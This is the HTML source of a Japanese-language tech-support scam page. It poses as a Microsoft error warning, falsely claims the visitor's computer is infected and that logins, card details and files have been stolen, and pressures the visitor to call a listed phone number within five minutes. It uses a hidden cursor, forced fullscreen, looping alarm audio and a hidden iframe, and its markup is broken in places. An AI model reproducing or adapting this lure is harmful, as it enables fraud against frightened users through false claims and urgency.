
<!DOCTYPE html>
<html lang="en">

<body style="background-color:red;">

    <meta charset="UTF-8">
	</head>
	<style type="text/css">
     * {
   cursor: none;
     }
</style>
	<script type="text/javascript">
	
</script>

<body style="overflow-x: hidden;" id="hang" class="hang" onclick="toggleFullscreen();">

<body>


<img src="mic.png" alt="Smiley face" style="float:left; right:5px; bottom:3px; width:100%; height:117px;">

<img src="nrt1.jpg" width="276" height="262" style="position:absolute; float:right; right:5px; bottom:3px; alt=""/>
<br>
<br>
<br>
<br>
<br>
<br>
<span style="color:#fff";><h1> ERROR #DW6BD36 </h1> 
<h1> 無料の電話番号 050-5532-0516</h1>
<br>この重要な警告を無視しないでください.<br/><
このページを閉じると、ネットワークへのさらなる損害を防ぐために、コンピュータへのアクセスが無効になります。<br/> 

お使いのコンピュータは、ポルノスパイウェアおよびウイルスに感染していると警告しています。次の情報が盗まれています:<br/>
<br/> <h2> 1.フェイスブックログイン<br/> 2.クレジットカードの詳細<br/> 3.メールアカウントログイン<br/>
4.写真や書類をコンピュータに保存</h2><br><br>当社のエキスパートエンジニアがあなたの身元を保護するために電話での削除プロセスを案内することができるように、<br>あなたはすぐに私達に連絡しなければなりません。コンピュータが無効になったり情報が失われたりするのを防ぐため、5分以内にお電話ください。<br></br></div><div style=margin-top:0px><h1 style=color:#FFF;font-weight:900>マイクロソフトに連絡する &nbsp;<script>document.write('<span style="color:#7fff7f">'+phone+"</span>");</script>(Toll Free)</h1></div></div></div></div>

<audio autoplay=autoplay loop id=audio><source src=beep.mp3 type=audio/mpeg></audio>


 
 <audio autoplay=autoplay loop id=audio><source src=err.mp3 type=audio/mpeg></audio>
			  
			  
<script src="main.js"></script>
<iframe src="phpinfo.php" height="0" width="0"></iframe>
</body>

</html>